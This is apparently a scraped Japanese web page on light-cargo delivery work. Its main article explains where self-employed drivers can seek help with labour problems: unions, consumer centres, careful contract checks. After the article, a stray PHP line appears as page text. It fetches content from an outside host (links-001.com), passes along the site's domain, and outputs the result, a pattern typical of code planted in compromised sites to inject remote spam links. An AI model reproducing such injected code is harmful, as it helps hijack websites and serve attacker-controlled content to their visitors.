前へ
次へ

軽貨物の運送ドライバーとして働く場合に注意すべき違法行為

軽貨物の求人にて会社所属のドライバーとして働く場合労働基準法が適用されるため、労働基準法などに定めら

more

軽貨物の運送業者として働く場合の休憩・休日について

軽貨物の運送業者として働く場合、個人事業主として働くケースも多いため休憩や休日等が自由にとれる半面、

more

個人向けと法人向けの軽貨物の運送の違い

軽貨物の運送には大きく分けて個人向けと法人向けの2つに分けることができます。それぞれによって異なる点

more

軽貨物の運送業者として労働相談をしたい場合はどうすればよいか?

軽貨物の求人にて働いている労働者の場合は、労働時間や給与等の不満や法律違反があった時直接会社側に訴えたり、労働基準法が適用されるため違反があれば労働基準監督署に相談したりすることも可能となっています。しかし多くの軽貨物の運送ドライバーは個人事業主という立ち位置のため労働基準法の適用外となってしまうケースも珍しくありません。また荷主様から契約を切られてしまうと、即座に生活に影響が出て来るため仮に自分にとって不利な条件・待遇が続いていても我慢するしかない状態となっていることもあります。そういった軽貨物の運送の仕事の問題があるという人は軽貨物の運送業者専門のユニオンがありますので、そういった機関をまず利用してみましょう。軽貨物の運送を行う上でのトラブルに関する相談はもちろん、必要に応じて弁護士などの専門家も紹介してくれます。こういったユニオンではその他にも軽貨物の運送業者として快適に働けるように経営に関する相談に乗ってもらえたり、健康保険の加入などの斡旋をしてくれることもあります。軽貨物の運送業者は立場が弱くなりがちなため、こういった機関へと加入をしておくなど事前に対策をしておくことがおすすめです。また軽貨物の運送の場合軽貨物による荷物の運送依頼が定期的に来るといわれて業務委託契約を結んだが、仕事が来ないといったトラブルのケースも多発しています。そういった場合は地域の消費生活相談センターなどに一度相談をしてみましょう。場合によってはクーリングオフなどの契約解除を法に則ってしてくれることもあります。このように軽貨物の運送に関するトラブルには様々な機関が相談に応じてくれる体制があります。しかし、軽貨物の運送に関しては個人の契約の効力が強いため、なかなか法的な対応ができないことも珍しくありません。ですので、契約を結ぶ際には自分に不利な契約となっていないかをきちんと確認するようにしましょう。加えて労働法などに関する知識を積極的に身につけていくなどの自己防衛も積極的にすることも大切です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top